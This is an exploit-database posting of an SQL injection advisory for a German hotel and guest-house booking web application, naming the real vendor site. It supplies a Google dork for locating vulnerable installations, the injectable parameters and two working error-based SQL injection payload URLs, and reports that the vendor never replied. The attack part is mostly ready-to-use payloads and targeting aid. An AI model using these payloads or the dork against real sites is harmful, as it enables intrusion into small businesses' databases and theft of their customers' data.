tourismus-marketing-bayerischer-wald SQLi

2018.05.25
ch Arm_Legi (CH) ch
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: tourismus-marketing-bayerischer-wald (webapp for Germans Hotel and Pension) SQLi # dork : intext:Tourismus Marketing Bayerischer Wald inurl:index.php?PageName= # Exploit Author: Arm_Legi (Anonplus) # Website: http://anonplus.tk/ # Date: 21 May 2018 # Vendor : https://www.tourismus-marketing-bayerischer-wald.de/internet.html and https://www.putzwerbung.de/webdesign.html # Version : Last Version # CVE: N/A Technical Details & Description: =============================================================================================================================================== A remote sql-injection web vulnerability has been discovered in a web app of https://www.tourismus-marketing-bayerischer-wald.de/internet.html The vulnerability allows remote attackers to inject own malicious sql commands to compromise the connected web-server or dbms. The website vendor Is vulnerable too. =============================================================================================================================================== Request Method(s): [+] GET Vulnerable File(s): [+] index.php [+] angebote.html Vulnerable Parameter(s): [+] PageName= [+] PauschalenID= ================================================================================================================================================================================================================================= PoC: Http(s)://site.de/index.php?PageName=index' AND (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(SELECT (ELT(1707=1707,1))),0x716b7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'dSRR'='dSRR http(s)://site.de/preise-angebote/angebote.html?PauschalenID=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(113)%2cCHAR(70)%2cCHAR(115)%2cCHAR(69)%2cCHAR(122)%2cCHAR(75)%2cCHAR(120)%2cCHAR(120))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) ================================================================================================================================================================================================================================== I try to contact the vendor with no Response !


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top